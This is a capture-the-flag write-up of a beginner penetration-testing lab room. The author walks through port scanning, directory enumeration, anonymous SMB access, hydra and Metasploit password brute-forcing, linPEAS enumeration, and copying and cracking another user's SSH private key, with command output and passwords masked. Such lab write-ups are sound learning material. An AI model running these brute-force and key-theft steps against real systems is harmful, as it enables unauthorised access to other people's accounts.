💭 Thoughts after doing the room

Usally I’m not really enthusiastic about background stories or “lore” in rooms, but this one was different because it was a little bit more realistic: People leaving notes that are relevant to the problem, so I enjoyed this one.

I also saw that the metasploit ssh bruteforce was really slow compared to hydra. I’ll have to check if there is something faster for metasploit some day.

Although it’s realistic I usually don’t like it if rooms hint on using “canons” like because they have such a verbose output and you have to dig through output although it’s clear that the authors of the room want you to use one specific weakness.

Task 1: Web App Testing and Privilege Escalation

Deploy the machine and connect to our network


Find the services exposed by the machine

Store IP for faster commands later


root@ip-10-10-138-220:~# nmap -T4 $IP

Starting Nmap 7.60 ( ) at 2023-03-28 21:03 BST
Nmap scan report for (
Host is up (0.0012s latency).
Not shown: 994 closed ports
22/tcp   open  ssh
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
8009/tcp open  ajp13
8080/tcp open  http-proxy
MAC Address: 02:4B:89:F2:D4:AF (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 1.74 seconds

What is the name of the hidden directory on the web server(enter name without /)?

Scanning with gobuster since we’re looking for a hidden directory.

root@ip-10-10-138-220:~# gobuster dir --url http://$IP -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url:  
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
2023/03/28 21:06:12 Starting gobuster
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/development (Status: 301)
/index.html (Status: 200)
/server-status (Status: 403)
2023/03/28 21:06:12 Finished

There are two files in /development

User brute-forcing to find the username & password

I don’t know why user bruteforcing is necessary, because you can login as anonymous via SMB and the solution is there with the next step. Maybe they meant bruteforcing SMB to immediately see that an anonymous login is possible.

What is the username?

Connect to SMB with smbclient and download staff.txt

root@ip-10-10-138-220:~# smbclient //$IP/anonymous
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Apr 19 18:31:20 2018
  ..                                  D        0  Thu Apr 19 18:13:06 2018
  staff.txt                           N      173  Thu Apr 19 18:29:55 2018

		14318640 blocks of size 1024. 11093120 blocks available
smb: \> get staff.txt
getting file \staff.txt of size 173 as staff.txt (33.8 KiloBytes/sec) (average 33.8 KiloBytes/sec)
smb: \> exit
root@ip-10-10-138-220:~# cat staff.txt 
Announcement to staff:

PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
this is how mistakes happen. (This means you too, Jan!)


What is the password?

So we know the user and then can try bruteforcing the SMB password for Jan. I’ll use Metsploit for this

using smb_login module

msf6 > use smb_login

Matching Modules

   #  Name                             Disclosure Date  Rank    Check  Description
   -  ----                             ---------------  ----    -----  -----------
   0  auxiliary/scanner/smb/smb_login                   normal  No     SMB Login Check Scanner

Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/smb/smb_login

[*] Using auxiliary/scanner/smb/smb_login

then set the options

msf6 auxiliary(scanner/smb/smb_login) > set RHOSTS
msf6 auxiliary(scanner/smb/smb_login) > set SMBUser Jan
SMBUser => Jan
msf6 auxiliary(scanner/smb/smb_login) > set PASS_FILE /usr/share/wordlists/rockyou.txt
PASS_FILE => /usr/share/wordlists/rockyou.txt
msf6 auxiliary(scanner/smb/smb_login) > exploit

[*]     - - Starting SMB login bruteforce
[+]     - - Success: '.\Jan:🤐'

only to realize that this information isn’t required. So I’ll try ssh with scanner/ssh/ssh_login

msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS
msf6 auxiliary(scanner/ssh/ssh_login) > set USERNAME jan
msf6 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /usr/share/wordlists/rockyou.txt
PASS_FILE => /usr/share/wordlists/rockyou.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set VERBOSE true
VERBOSE => true
msf6 auxiliary(scanner/ssh/ssh_login) > exploit

It seem to be very slow, so I’ll try hydra to check if it’s better.

root@ip-10-10-138-220:~# hydra -l jan -P /usr/share/wordlists/rockyou.txt $IP ssh
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra ( starting at 2023-03-28 21:34:29
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking ssh://
[STATUS] 259.00 tries/min, 259 tries in 00:01h, 14344142 to do in 923:03h, 16 active
[STATUS] 246.33 tries/min, 739 tries in 00:03h, 14343662 to do in 970:29h, 16 active
[22][ssh] host:   login: jan   password: 🤐
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 5 final worker threads did not complete until end.
[ERROR] 5 targets did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra ( finished at 2023-03-28 21:37:41

pretty fast result.

Enumerate the machine to find any vectors for privilege escalation

What is the name of the other user you found(all lower case)?

Login sucessfull, quick check for something obivious

jan@basic2:~$ whoami
jan@basic2:~$ ls
jan@basic2:~$ sudo -l
[sudo] password for jan: 
Sorry, user jan may not run sudo on basic2.

Checking the users via passwd


There is one interesting user with the UID 1000

If you have found another user, what can you do with this information?

Because the task is “enumerate the machine” and there are no obious hints in the directory I’ll check the hints if they want the big guns. YEP. linPEAS it is

I download linPEAS and copy the script over, because the target machine has no internet connectivity

scp jan@$IP:/tmp

In the output there is a section for readable files in other directories. It seems that I have access to the private key of kay.

Files inside others home (limit 20)

I’ll also transfer this over

scp jan@$IP:/home/kay/.ssh/id_rsa .

trying to login

root@ip-10-10-138-220:~/basics# ssh -i ./id_rsa kay@$IP
Enter passphrase for key './id_rsa':

private key has a passphrase.

Converting the private key into a hash for john with ssh2john

root@ip-10-10-138-220:~/basics# locate ssh2john
root@ip-10-10-138-220:~/basics# /opt/john/ ./id_rsa > ssh.hash

Scanning with john. First I was running into a problem that it gave weird output like

Warning: only loading hashes of type “SSH”, but also saw type “tripcode”

but I noticed that I did the command syntax wrong.

Not working: john ssh.hash --wordlist /usr/share/wordlists/rockyou.txt

Working: john ssh.hash --wordlist=/usr/share/wordlists/rockyou.txt

root@ip-10-10-138-220:~/basics# john ssh.hash --wordlist=/usr/share/wordlists/rockyou.txt 
Note: This format may emit false positives, so it will keep trying even after finding a
possible candidate.
Warning: detected hash type "SSH", but the string is also recognized as "ssh-opencl"
Use the "--format=ssh-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
🤐          (./id_rsa)
1g 0:00:00:11 DONE (2023-03-28 22:09) 0.08539g/s 1224Kp/s 1224Kc/s 1224KC/s Vamos
Session completed.

What is the final password you obtain?

logging in with ssh and checking the contents of the directory

kay@basic2:~$ ls
kay@basic2:~$ cat pass.bak